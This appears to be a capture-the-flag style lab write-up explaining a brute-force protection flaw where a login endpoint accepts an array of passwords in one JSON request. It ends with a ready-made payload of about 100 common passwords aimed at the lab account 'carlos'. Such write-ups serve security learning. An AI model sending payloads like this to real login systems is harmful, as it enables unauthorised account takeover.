Broken brute-force protection multiple credentials per request is a web vulnerability that falls under the authentication vulnerability category. Due to this vulnerability, an attacker can submit a list of passwords in a single request to a web application. If any of the passwords in the list works, the attacker receives a 302 redirect and gains access to the user’s account.
As this vulnerability is related to authentication, an attacker captures the login request in JSON format and hits the same passwords repeatedly in high volume.
Practical lab solution:
The level of this lab is expert. It contains a logical flaw in its brute-force protection. To solve the lab, we need to brute-force the carlos account with a list of passwords that has already been provided to us.
See in the above screenshot, when an invalid username or password is provided, a POST based request is sent with the name /login. The username and password are visible in JSON format in Broken brute-force protection.
Next, simply access the list of passwords provided in the lab. Change the username to carlos in the JSON data and insert the list of passwords. You can ask ChatGPT to provide you with the list of passwords in JSON format. which you can copy and paste into the request.
Now you will receive a 302 response. Which means you have successfully logged in to carlos’ account. The lab is solved.
Don’t cry bro, here is the payload. 🙂 Don’t forget to follow me on Twitter @masaudsec.”
{"username":"carlos","password":[ "123456", "password", "12345678", "qwerty", "123456789", "12345", "1234", "111111", "1234567", "dragon", "123123", "baseball", "abc123", "football", "monkey", "letmein", "shadow", "master", "666666", "qwertyuiop", "123321", "mustang", "1234567890", "michael", "654321", "superman", "1qaz2wsx", "7777777", "121212", "000000", "qazwsx", "123qwe", "killer", "trustno1", "jordan", "jennifer", "zxcvbnm", "asdfgh", "hunter", "buster", "soccer", "harley", "batman", "andrew", "tigger", "sunshine", "iloveyou", "2000", "charlie", "robert", "thomas", "hockey", "ranger", "daniel", "starwars", "klaster", "112233", "george", "computer", "michelle", "jessica", "pepper", "1111", "zxcvbn", "555555", "11111111", "131313", "freedom", "777777", "pass", "maggie", "159753", "aaaaaa", "ginger", "princess", "joshua", "cheese", "amanda", "summer", "love", "ashley", "nicole", "chelsea", "biteme", "matthew", "access", "yankees", "987654321", "dallas", "austin", "thunder", "taylor", "matrix", "mobilemail", "mom", "monitor", "monitoring", "montana", "moon", "moscow"] }